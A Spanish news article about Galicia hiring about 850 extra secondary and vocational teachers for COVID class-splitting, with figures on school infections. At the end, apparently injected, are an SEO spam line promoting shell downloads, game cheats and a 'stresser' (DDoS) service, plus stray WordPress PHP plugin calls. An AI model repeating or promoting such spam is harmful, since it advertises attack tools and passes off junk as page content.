Casi 850 profesores más de refuerzo ante el coronavirus en Secundaria, Bachillerato y F.P.



Natalia SequeiroSEGUIRSantiago
Actualizado:16/09/2020 15:17h
Guardar
Noticias relacionadas

Tras semanas de incertidumbre, Educación ya sabe el número de profesores que necesitará para que los centros de Secundaria, Bachillerato y Formación Profesional puedan cumplir los protocolos anti Covid. El conselleiro Román Rodríguez explicó esta mañana que ya se está empezando a llamar a 847 docentes para poder aplicar los desdobles de aulas que sean necesarios y garantizar que los alumnos estén separados 1,5 metros.

En total, explicó el conselleiro Galicia contará este curso con un incremento de 1.890 profesores, un 6,2% más que el año pasado. En el cómputo global se incluyen también los 240 profesionales ya contratados para Educación Infantil y Primaria y los docentes ya previstos para programas de refuerzo educativo.

Rodríguez aseveró que Galicia «será una de las autonomías con menor ratio de docentes por alumno» y agradeció a los equipos directivos de los centros y a los inspectores el trabajo realizado. La Consellería decidió la semana pasada retrasar siete días el inicio del curso debido a que los centros de Secundaria, Bachillerato y F.P. aún no estaban preparados para poder cumplir con las exigencias para evitar los contagios.

Tras reunirse con el comité clínico de expertos sanitarios y con el conselleiro del ramo, Rodríguez explicó que desde que los alumnos de Infantil y Primaria volvieron a las aulas se han detectado 29 contagios en el entorno educativo. Hay 11 clases cerradas y un colegio clausurado.

Ver los
comentariosTemas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );